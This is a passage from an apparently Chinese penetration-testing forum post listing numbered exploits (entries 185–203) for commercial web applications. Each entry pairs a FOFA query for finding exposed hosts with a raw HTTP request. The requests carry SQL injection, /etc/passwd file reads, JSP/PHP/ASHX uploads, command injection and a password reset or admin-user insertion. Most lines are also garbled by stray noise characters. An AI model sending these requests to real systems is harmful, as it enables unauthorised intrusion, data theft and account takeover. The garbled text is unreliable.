POST /soap/AddUser HTTP/1.1
7 |$ p0 S+ j) a! v4 yHost: your-ip
0 P) U2 r, U! R1 Q3 W+ z6 IAccept-Encoding: gzip, deflate
/ v& V, X  g: ]6 B* BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
  t6 }. N  V* p$ N1 ]7 GAccept: application/xml, text/xml, */*; q=0.01
; Y% B8 f( j- u6 vContent-Type: text/xml; charset=utf-8
; x1 F+ u. T! N. H% z+ qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ Z2 h+ S- b4 @8 E0 }& ]2 N: t2 x8 S
X-Requested-With: XMLHttpRequest1 _' W  g5 F, Z' f- K# h8 }

. f8 z0 \1 k  K, K
" n% @! E1 O! J3 R0 @insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')3 s# v4 Z  _% m+ m( Q$ y& v4 D
2 Z4 e8 T4 @7 W& m* _+ m" H

, ^; |* O3 ], [: z5 [6 K; F5 d185. 瑞友天翼应用虚拟化系统SQL注入# V+ o7 u6 o6 s
version < 7.0.5.1
6 s* _+ D* R+ r  p5 N. ZFOFA:app="REALOR-天翼应用虚拟化系统"8 G7 w4 w" y1 c
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
& q5 L  D$ d* _5 cHost: host6 U. ]( [8 W" B: C& q: a

0 W$ b8 y  i/ D( L! S$ t+ W6 [3 t; ~3 i& {; x
186. F-logic DataCube3 SQL注入
" D. z' P1 y5 ?5 r5 e6 s- |CVE-2024-31750
6 ?- i$ u: [% u+ E/ OF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统; ]( \' l8 X) i: I
FOFA:title=="DataCube3"5 p8 G& V2 `3 H% P' s
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
+ k3 h8 k$ A% f5 C8 uHost: your-ip
- b7 ^. N4 L8 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
7 s4 ]6 U5 J9 t& JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
. e7 _, y& O) S5 [* N/ ^+ UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ u3 w/ K5 V5 I3 d! OAccept-Encoding: gzip, deflate8 h5 o0 g8 Z6 s( q
Connection: close
. c- m  p6 q) lContent-Type: application/x-www-form-urlencoded
1 Y$ C3 w( r0 u9 D1 x1 X4 s
6 M& p4 U; c" Oreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
1 M5 S9 B6 N+ b2 G0 L2 k5 H6 b9 ^1 `
: U. u$ c. A& F  i% g8 ~9 R! i
187. Mura CMS processAsyncObject SQL注入
9 b0 p; H$ V! ~  wCVE-2024-32640
4 R+ C8 i9 k3 {4 N- B" iFOFA:"Mura CMS": \) }+ `9 ?, o" V
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.16 {. Z* m* h: e/ ?* Q* t4 d  ]
Host: your-ip8 A! u* {6 `: t
Content-Type: application/x-www-form-urlencoded/ t" M, q5 B1 Q" n: E1 P
1 C; e5 m/ x, ^" Q7 g; t
$ |/ Z" c  E) r  [% O" Y! g
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1% M: Z% ~8 E& D3 [

: D5 I, e5 z0 N, i! j1 n2 k9 Z/ N6 ~! g* D8 C7 s. R  ^9 i
188. 叁体-佳会视频会议 attachment 任意文件读取. }8 U9 ^+ K! r! p# d! y1 q% L) _4 ?
version <= 3.9.70 g- w! Z4 p* l) j4 Q
FOFA:body="/system/get_rtc_user_defined_info?site_id"
4 V) z' B3 w$ U& `! b9 oGET /attachment?file=/etc/passwd HTTP/1.1+ h+ V" s( E8 S
Host: your-ip) {$ b& W0 R  p# E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36, d( K3 @, k# ~1 V4 q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 @6 W0 H( H7 e; g+ d/ u0 o6 h' mAccept-Encoding: gzip, deflate, m' t8 G3 T, d* g
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
0 g$ H+ d6 T9 y$ l/ T: TConnection: close
) t" w5 d. d' p2 A3 L; U+ D( Q
$ h' A6 a5 }7 ~" ?# e, D" E+ ]
: H3 W" S1 n) P/ d' T' @189. 蓝网科技临床浏览系统 deleteStudy SQL注入
& f$ |5 Z: T- G2 tFOFA:app="LANWON-临床浏览系统"* Y' m: b; g* a, ]
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.11 B8 |1 t* b6 o. N+ a
Host: your-ip
5 R1 O, K& E% G/ z  ]1 L8 r# a. b% VUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
' a' i2 }* \( B% E& G/ VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 h- B+ G( D6 hAccept-Encoding: gzip, deflate
, Z' b$ B* A8 u+ c" VAccept-Language: zh-CN,zh;q=0.9
' g) {9 u( `& ?* ^: y1 `. J$ S; zConnection: close
+ i; t8 C; @4 E5 l& ~* e$ W" w) P8 K- |2 d, D" \

0 A6 ?1 \: \! b7 T. Q; t4 {190. 短视频矩阵营销系统 poihuoqu 任意文件读取
& [( o% ~2 u* ZFOFA:title=="短视频矩阵营销系统"
. r, g% _2 H' \' lPOST /index.php/admin/Userinfo/poihuoqu HTTP/2; s, W" u* {& J/ F! p" U7 ~4 o8 l
Host: your-ip
& C5 W, z3 f, [' x" KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36# B7 J0 L/ `6 X1 l% L3 Z% C' t0 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
$ j5 t; Q" Q0 v. K7 G" dContent-Type: application/x-www-form-urlencoded# U+ M# V. k. ~* C
Accept-Encoding: gzip, deflate
" b: l1 J$ N! x' k* h  h8 H. ~' lAccept-Language: zh-CN,zh;q=0.9
! |* u: @- a. H8 ]! g9 {
& y% H+ }5 B' k8 Ppoi=file:///etc/passwd0 G& A7 q* B4 l  R' z/ u

/ H0 _2 ?4 W; m" ?& I$ H2 k
( U, a2 [2 h% h' e# i! L2 T! r191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入8 }) O0 y! q4 z' M4 a
FOFA:body="/CDGServer3/index.jsp"  y" h# e* G/ }) a
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
# m  d8 x, M/ D3 z5 V& rHost: your-ip
, }) h# {3 P3 W# T* B) o# f. OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 _  Q4 i1 C1 M* j+ r
Content-Type: application/x-www-form-urlencoded
/ O$ D0 u( Q, R1 N5 ]2 ^: R2 Z' b1 g
. ^9 s: q/ v0 J2 {# B, hcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
3 @, M( s- k, I6 V9 S  g7 Q: ?/ _0 `. H

" e5 S" o1 P5 M! j- F$ Y* ^" I192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
% `' j0 p) N6 v; q3 {6 V; o. JFOFA:title="用户登录_富通天下外贸ERP"8 m# n2 O- O. x8 L# o
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
# x& H& @/ C9 j; F% ^" `7 uHost: your-ip
: U+ K) E' T( RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
) C  c3 n- t7 e$ Q( h% w* D2 XContent-Type: application/x-www-form-urlencoded
8 f. j' }. g% I3 G# k3 p- M& {1 v) H( B( J
8 s2 J- V6 i! V* T) M5 s
<% @ webhandler language="C#" class="AverageHandler" %>3 l% i' p6 |; t3 ~4 ~7 @
using System;+ g( Y+ M8 l7 b. _6 ]6 s
using System.Web;
: y" a" ]( Z. D7 G% B. t3 C! xpublic class AverageHandler : IHttpHandler
' M3 t6 k: d! h  `{7 M4 @9 x! x) ]
public bool IsReusable
) o- S# Q4 v8 G1 p7 a, {- Z$ d2 F{ get { return true; } }# I9 h: h& u# Y- G7 n
public void ProcessRequest(HttpContext ctx)  o$ T: q8 K7 S
{
' Z4 D" b3 i3 q: Y6 T  Hctx.Response.Write("test");: K0 v6 Z( x, I$ @$ p0 o: r3 F
}$ O1 o% S) C% Q4 s( Z7 J
}% H( k" H4 G. ^8 M
" [% m7 g$ M$ C7 u' V: y% B
# h6 ^# A, Z" Y; {# K' z* C
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
" J$ z1 c: |- o: qFOFA:body="山石云鉴主机安全管理系统"
7 y4 R" _9 {$ Y$ N; I0 W1 m' SGET /master/ajaxActions/getTokenAction.php HTTP/1.1
$ \% `0 F# @, f& p$ }Host:
( m% a1 Q; B! X; @Cookie: PHPSESSID=2333333333333;
; j7 W0 B) x9 J1 TContent-Type: application/x-www-form-urlencoded
4 Y2 K6 E, ^& }) u" }; f  ]User-Agent: Mozilla/5.0
$ }  K% M, [+ J- l: v" n/ O
/ ?) w( J3 y( O9 Q% Y# s+ @
* b$ A/ j/ G/ R- bPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
" j8 F' y; U1 V9 A, hHost:- L3 a1 u0 h! |; |' {; M' [
User-Agent: Mozilla/5.03 z7 H' c% [# `# F& y7 s
Accept-Encoding: gzip, deflate& b! y; K/ p& R3 v, L
Accept: */*
* Z  N4 U$ A  {% N1 ^1 m/ a0 [Connection: close+ c8 C1 X- z8 c* h
Cookie: PHPSESSID=2333333333333;
& i0 m( [. h* FContent-Type: application/x-www-form-urlencoded* l1 k+ T3 H4 i0 l
Content-Length: 84
3 |& N/ E1 |; n% J5 r- q7 `: b5 b$ G+ r4 c/ T- @4 s  v
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
" h* O0 a% o; l( `6 M
7 \9 k3 c$ L8 c) j' C! i2 a  ]1 n! J: B/ T2 z- ^- }* k- d
GET /master/img/config HTTP/1.18 J, w7 }- e0 J+ [
Host:) U) ?  n, U2 x' n
User-Agent: Mozilla/5.0
" f+ D' i3 V; @3 P5 ^% K& N
. v7 L) }& X9 A, n/ x) J% S: ?5 O+ T2 x5 C2 }
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传+ S: X0 |, n& [( G6 \% {
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在% h' I0 U1 ~# ~$ B

3 `5 {. s( }( Q; V8 p1 PPOST /servlet/uploadAttachmentServlet HTTP/1.1
4 m0 d* g; m8 L7 ]$ G& }Host: host6 A( n' P6 R2 [2 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
  a& g7 G. N( w% m' ]6 M( zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  l$ U( p& y& u- D- T% j) N! WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( {( u2 U0 ]4 Y( _Accept-Encoding: gzip, deflate! W# A9 S3 i/ w4 q
Connection: close
# Z4 P- Q' R* H+ T0 b: ~Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk) L" m5 S* H8 N' f! J
------WebKitFormBoundaryKNt0t4vBe8cX9rZk" \0 L) ?, ~9 q( `7 `5 g

) O) ~0 v( D+ i7 p* VContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"9 p$ Z& d, V0 D1 |
Content-Type: text/plain
, d9 M& T7 H2 T1 X2 h" C! H<% out.println("hello");%>
2 h* M% t2 I8 @( t& V# k------WebKitFormBoundaryKNt0t4vBe8cX9rZk2 H; n: h5 h9 A; d& y+ o1 t! v) m( o
Content-Disposition: form-data; name="json"
6 J2 S. d+ V/ w" B  v$ @/ ^5 V {"iq":{"query":{"UpdateType":"mail"}}}
1 O- P3 K8 f$ L9 r7 t; r: `% Y------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
" U" f7 v0 ^0 i1 O, z. s
% c3 _3 ]4 @# n$ K+ t3 x
9 e% N) j8 d+ u. N5 I" X195. 飞鱼星上网行为管理系统 send_order.cgi命令执行2 S( `6 @/ H$ y
FOFA:title=="飞鱼星企业级智能上网行为管理系统. z& K# z6 Y2 [7 T
POST /send_order.cgi?parameter=operation HTTP/1.1# u: i8 E3 ^9 ^. O
Host: 127.0.0.1& N, Q1 ]8 T5 _- x+ Y9 R) n- m8 O  d
Pragma: no-cache
1 T4 E4 K: Y, b& T5 A; O( oCache-Control: no-cache  ]1 J1 D0 p, d9 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
* R& o5 z$ Y4 d0 {1 o" wAccept: */*
$ ?8 k( Y, S" C, A$ a$ GAccept-Encoding: gzip, deflate
& W/ r7 A8 ^* Y6 K* FAccept-Language: zh-CN,zh;q=0.96 F: [$ s; Y. L5 k1 \+ B
Connection: close
* z- w1 E9 u1 x' j/ v* fContent-Type: application/x-www-form-urlencoded# G9 p' Y# \1 _( m1 b
Content-Length: 687 I, S6 @) T' `+ X
- e  ]/ {) d) R2 b
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
8 Z' ]& F/ }  ]( j  V" {9 j# ~& D  _- g  L
$ g4 l0 l. p) y3 ?7 @  S7 H# o. [( L9 f5 z* A0 [
196. 河南省风速科技统一认证平台密码重置
6 O% ~2 a9 Z" [8 iFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
: x2 E1 ^7 {- `0 Y7 |POST /cas/userCtl/resetPasswordBySuper HTTP/1.14 R$ s$ I! n2 U0 C9 _( g5 a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36- j5 j" z1 D! N* t1 W
Content-Type: application/json;charset=UTF-89 A  j; W* v% D; W
X-Requested-With: XMLHttpRequest
5 o' N. d; \( L7 |' }Host:/ F0 Y$ X  |, e$ `5 T% E) @  O- Y
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2- {# S, @% U) `6 W
Content-Length: 450 W4 E. S7 c( T1 t" n- S8 b/ L0 d1 R
Connection: close
0 Y; `" ]1 `$ q  |6 ?0 ^! q4 r; H3 D% I! n) W% x/ c
{"xgh":"test","newPass":"test666","email":""}3 Z9 _" ?; Z: q$ G9 Z6 s) _
, x& z' X! M4 j3 ~: z% f6 M

) Z$ ]0 p9 `( g6 Z1 ^7 g$ Z* [7 O" g# {, M2 ~6 _6 [
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
/ C; Q. @9 \" j8 M7 f* E4 w5 RFOFA:app="浙大恩特客户资源管理系统"& f' a8 q6 R  h7 u. A9 J3 g% w
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1, A2 L9 x9 b# W: b4 J& w! V- l; c; o+ G' J
Host:
0 S* t- w4 d2 ~" e! m4 DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
6 [/ Z7 @* m) Q% `3 MAccept-Encoding: gzip, deflate
$ t0 d0 p: y0 u8 Q- g0 yConnection: close8 S7 Y7 C# Y$ z
. k2 r0 U/ I; }9 e
  S" @7 N5 J- _( E; K$ ]/ ]; I/ Z
! f- H1 P5 ^& `2 c6 s) Y
198.  阿里云盘 WebDAV 命令注入
! h6 V+ S) J/ j& j. x/ UCVE-2024-29640
+ Z( A5 A! l1 y$ U& ~& KGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.15 {& ^5 n) B/ x4 B
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64) ]" t( p# R( V1 p
Accept: */*
+ W; T1 i3 g9 o$ AAccept-Encoding: gzip, deflate! t" c9 ?8 M; Y# L4 P
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.68 X0 v5 w7 E1 F- [& O6 I
Connection: close
/ y6 A* Y& N2 o
" [  m6 i! w/ M2 h2 {  u1 u  m2 p
0 i2 g% H+ `7 X' Y( J5 N9 T199. cockpit系统assetsmanager_upload接口 文件上传0 q+ r0 k+ h! J/ E$ Y  w0 {, [! m

' z# k9 l( Z4 l7 F, x& Y( `1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
* U- G3 ~: ^% a( Z& K8 J+ H! N! ]' QGET /auth/login?to=/ HTTP/1.1" V& N! a. Y1 ~

& {5 P  p0 t+ d% f9 d1 Z- w) C9 P响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"* d6 A7 E# b! v3 N

' G6 Y) |/ D) G% N8 M2.使用刚才上一步获取到的jwt获取cookie:
' a* W8 N. m. i( u
5 ]& |* U7 F5 ]9 V# J+ g9 PPOST /auth/check HTTP/1.1
# j/ G1 n' b+ j1 M. qContent-Type: application/json6 _# u# i, Z; l; N1 q/ b
: j4 y: W" e4 Q  W$ T  J
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}" r" I' r2 o; n4 x( b, [1 I3 p

$ W# q' V  Q- w( ?! x6 }7 d( I响应:200,返回值:; G! G9 n3 k" F- x; K
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/0 [! p' B# K$ a9 U/ N/ M: k
Fofa:title="Authenticate Please!"4 m* b6 ?$ b, b6 {6 |
POST /assetsmanager/upload HTTP/1.1
! @3 E% W) Y; g7 U$ f/ ?" [1 dContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
: c  D' T5 Z  E/ @3 e  C, hCookie: mysession=95524f01e238bf51bb60d77ede3bea92" f* P% h' U5 v) ~2 G9 J

$ D* B+ E$ [0 i7 m4 g( J' D-----------------------------36D28FBc36bd6feE7Fb3: B/ s2 M; L- F& {
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
9 J, y5 f+ e/ p7 qContent-Type: text/php
, _8 c# K" a6 @$ Y2 w3 e  ]5 }7 M3 u8 Q5 F
<?php echo "tttt";unlink(__FILE__);?>
! z' `. K9 W) A, G-----------------------------36D28FBc36bd6feE7Fb30 O0 v5 N1 s. a: K% U- S
Content-Disposition: form-data; name="folder"/ {3 ?, t2 z, i( m2 N% P* k
8 c' Q! N2 t& `$ ~& `
-----------------------------36D28FBc36bd6feE7Fb3--1 C# i' I0 |9 [2 d
$ @" [7 @, F* F
7 Q+ I1 j& x) i/ H3 w# Z& c. o! ^
/storage/uploads/tttt.php
  k" ^7 ]" `& p# l2 _7 s, f; |1 c7 g9 y! y; R
200. SeaCMS海洋影视管理系统dmku SQL注入
8 v( M- N/ B! ]1 R# SFOFA:app="海洋CMS"
, x+ Q& p0 {2 Z4 @$ q. x* \" oGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1/ k; y) y& V% B. o; Z8 o5 O9 Z1 d
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s! Y' o) t! r( w4 b: p- N: z
Upgrade-Insecure-Requests: 16 C! S6 |/ R0 K8 x8 @( @1 m) A
Cache-Control: max-age=0
; h4 C) E: |! N1 a( b4 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 `' u: K+ |0 H- F# hAccept-Encoding: gzip, deflate
6 x3 Y; J. w5 ~& H3 yAccept-Language: zh-CN,zh;q=0.9
5 J3 i" m7 G7 q9 y
2 W" @$ G. [8 o# {6 [2 N% P% g. ?/ Q  }5 n+ d0 |6 o2 a# w. T
201. 方正全媒体新闻采编系统 binary SQL注入* R- ~1 D! |+ d. H' j% ^
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
. z" i2 v% ~4 R' B2 YPOST /newsedit/newsplan/task/binary.do HTTP/1.1
$ o5 B& |9 d: n+ `! \, U! e, ^Content-Type: application/x-www-form-urlencoded
/ W* w) ?9 F+ tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 A' }* J1 E) }$ n1 D) eAccept-Encoding: gzip, deflate# j1 h" ^/ \4 t) e5 Z9 w
Accept-Language: zh-CN,zh;q=0.90 O2 _, h$ b2 p% Y+ \
Connection: close
2 P7 \7 y4 X; Z
/ A7 l9 z( j/ b" Y4 }- `8 lTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1' M% f9 e% a, d6 b- z$ _+ n! z

( S2 ]% E+ e" k. H: }; K. e$ [- J/ e1 `6 K& K, m. R
202. 微擎系统 AccountEdit任意文件上传+ A: S. Z. X) S
FOFA:body="/Widgets/WidgetCollection/"6 j2 r5 `( [; t- ^0 g: b0 D: w  f
获取__VIEWSTATE和__EVENTVALIDATION值
! a& n; ]1 ~- x; z! V1 L. @1 qGET /User/AccountEdit.aspx HTTP/1.1/ W5 I+ Y3 o0 ?9 w; N" b7 Z
Host: 滑板人之家8 j" x8 @2 N' z$ E, |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
* G. a* |4 m* SContent-Length: 0
" e, l, r9 \5 p( Q8 x7 f$ \* ]! T; u, V1 H* s# o6 g  q* I. _, x2 l5 M9 d
. H) k% S; v" R" ]; l% `/ ?& p
替换__VIEWSTATE和__EVENTVALIDATION值
8 w. Y& O9 x: s) V5 mPOST /User/AccountEdit.aspx HTTP/1.1
* J) x7 u, y  \: [9 C4 FAccept-Encoding: gzip, deflate, br/ S$ m8 O3 p) R6 g! d
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687  J/ Z% e+ ]! h3 g
5 J2 n6 [: l- L1 V0 N4 O$ E
-----------------------------786435874t38587593865736587346567358735687, U  A; G) m& r! C+ c" Z/ U) ~
Content-Disposition: form-data; name="__VIEWSTATE"
9 c5 ~- ]  \9 k1 ^0 p/ ]' r3 M, D1 ?) U
__VIEWSTATE& O' a/ g7 ~1 n' f1 I! x
-----------------------------786435874t38587593865736587346567358735687
, h5 y: a2 J" G: d, tContent-Disposition: form-data; name="__EVENTVALIDATION"
5 O* j# i  E4 n" M  e0 O! u- J8 l+ p* `6 [
__EVENTVALIDATION5 C9 [7 y' c8 N7 Q4 M* `8 P
-----------------------------786435874t38587593865736587346567358735687
/ F& I. V  B' {3 ^# b0 @Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"! t( q$ d/ `# c# j( T- e. f
Content-Type: text/plain( p2 g) j: p" _7 P
+ J9 e8 K$ ?3 J7 D. Z2 C! M
Hello World!3 r) J, F% g* o  R; S
-----------------------------786435874t38587593865736587346567358735687$ Q# j! m4 @1 H! C4 C
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
3 c( i8 W( p( t$ w( i# ^4 |( g3 A5 |* N+ _
上传图片# S0 O5 c! q9 o
-----------------------------786435874t38587593865736587346567358735687
. K/ I8 x  u$ WContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
5 h4 {& Q) G9 Y4 M. Z, ]# u% a* \
( h: }- h8 ]; \: O3 ]7 G: V$ a3 H/ b5 R; d
-----------------------------786435874t38587593865736587346567358735687( R  Z: l) x  F6 B6 L4 t' c, A. S
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
, T) [5 z# z7 ^( W/ p1 l8 I- ]/ N2 d: |

. C4 u# r' C: W) N-----------------------------786435874t38587593865736587346567358735687--
8 G9 e8 B" Q( d  o
, |" g% q6 K/ c+ ^. q- u' G. t2 N* w$ T
/_data/Uploads/1123.txt
$ ^  y. q# ]$ K) a" Z& Z2 ]( I) p6 J, O( R5 D5 B" O
203. 红海云EHR PtFjk 文件上传
/ `! p7 [% R. ^3 mFOFA:body="RedseaPlatform"- [& z6 R8 @" s4 G
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
) Y! U" l- Q- vHost: x.x.x.x
- f6 w" @! {+ fAccept-Encoding: gzip; R- l, k8 y6 N' v) ^' m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: O+ m- B& R! P/ @5 U$ W
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
/ k9 m% ~6 \$ n9 @Content-Length: 210+ F- z" a* z$ b

5 ?7 ?- {, n/ [------WebKitFormBoundaryt7WbDl1tXogoZys41 ?2 |+ D) s% h7 N. J
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
. K# B% f0 _2 u5 l6 aContent-Type:image/jpeg* A( \. O2 `  s, z. _8 t+ q/ W3 ]
* L  [0 r2 M( r
<% out.print("hello,eHR");%>
  g/ A' q& D6 X4 E------WebKitFormBoundaryt7WbDl1tXogoZys4--3 G/ v; V3 r0 m6 O8 D  [

+ D3 x+ m5 {% ]" B& d/ {5 y
, ?2 j$ T$ c$ g/ A, B% W" h. ]; y2 ~2 F5 P, P- Y+ s2 h9 |7 Y

8 c4 M* k+ a# B: g/ z
# W' M& b" V' F( m
0 }* d; U; ]' a



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2